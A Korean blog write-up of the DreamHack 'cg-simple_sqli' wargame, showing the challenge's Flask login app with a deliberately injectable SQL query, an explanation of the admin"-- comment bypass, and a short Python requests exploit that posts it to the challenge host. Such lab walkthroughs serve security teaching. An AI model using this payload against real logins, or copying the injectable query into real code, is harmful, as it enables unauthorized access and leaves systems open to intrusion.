본문 바로가기
DreamHack

[DreamHack] cg-simple_sqli

STEADINESS_HACK 2023. 8. 8. 08:41

https://dreamhack.io/wargame/challenges/890

 

cg-simple_sqli

Description 로그인 웹 서비스입니다. admin 유저로 로그인하면 비밀 정보를 얻을 수 있습니다. SQL Injection 취약점을 이용하여 admin로 로그인하세요! 본 문제는 2023 사이버 가디언즈 보안 캠프 용 실습

dreamhack.io

난이도: Level 1

app.py 

#!/usr/bin/python3
from flask import Flask, request, render_template, g
import sqlite3
import os
import binascii

app = Flask(__name__)
app.secret_key = os.urandom(32)

try:
    FLAG = open('./flag.txt', 'r').read()
except:
    FLAG = '[**FLAG**]'

DATABASE = "database.db"
if os.path.exists(DATABASE) == False:
    db = sqlite3.connect(DATABASE)
    db.execute('create table users(userid char(100), userpassword char(100));')
    db.execute(f'insert into users(userid, userpassword) values ("guest", "guest"), ("admin", "{binascii.hexlify(os.urandom(16)).decode("utf8")}");')
    db.commit()
    db.close()

def get_db():
    db = getattr(g, '_database', None)
    if db is None:
        db = g._database = sqlite3.connect(DATABASE)
    db.row_factory = sqlite3.Row
    return db

def query_db(query, one=True):
    cur = get_db().execute(query)
    rv = cur.fetchall()
    cur.close()
    return (rv[0] if rv else None) if one else rv

@app.teardown_appcontext
def close_connection(exception):
    db = getattr(g, '_database', None)
    if db is not None:
        db.close()

@app.route('/')
def index():
    return render_template('index.html')

@app.route('/login', methods=['GET', 'POST'])
def login():
    if request.method == 'GET':
        return render_template('login.html')
    else:
        userid = request.form.get('userid')
        userpassword = request.form.get('userpassword')
        res = query_db(f'select * from users where userid="{userid}" and userpassword="{userpassword}"')
        if res:
            userid = res[0]
            if userid == 'admin':
                return f'hello {userid} flag is {FLAG}'
            return f'<script>alert("hello {userid}");history.go(-1);</script>'
        return '<script>alert("wrong");history.go(-1);</script>'

app.run(host='0.0.0.0', port=8000)

위 코드는 매우 간단한 SQL Injection 문제로 SELECT * FROM users WHERE userid="admin"-- 쿼리 문이 동작하도록 조작해 주면 됩니다.   

 

userid에 admin--를 입력하고 패스워드에는 아무 값이나 입력하면 됩니다. 그 이유는 admin 뒤에 -- 는 주석을 의미하기 때문에 -- 뒤에 부분이 모두 주석처리 되어 실행되지 않기 때문입니다. 

Exploit Code

import requests

url = "http://host3.dreamhack.games:15178/login"
data = {"userid": "admin\"--", "userpassword": "1"}

res = requests.post(url, data=data)
print(res.text)

 

위와 같이, 플래그를 얻을 수 있습니다. 

저작자표시

'DreamHack' 카테고리의 다른 글

[DreamHack] Flying Chars  (0) 2023.08.08
[DreamHack] phpreg  (0) 2023.08.08
[DreamHack] amocafe  (3) 2023.08.08
[DreamHack] development-env  (0) 2023.08.07
[DreamHack] Format String Bug  (0) 2023.06.19

'DreamHack' Related Articles

티스토리툴바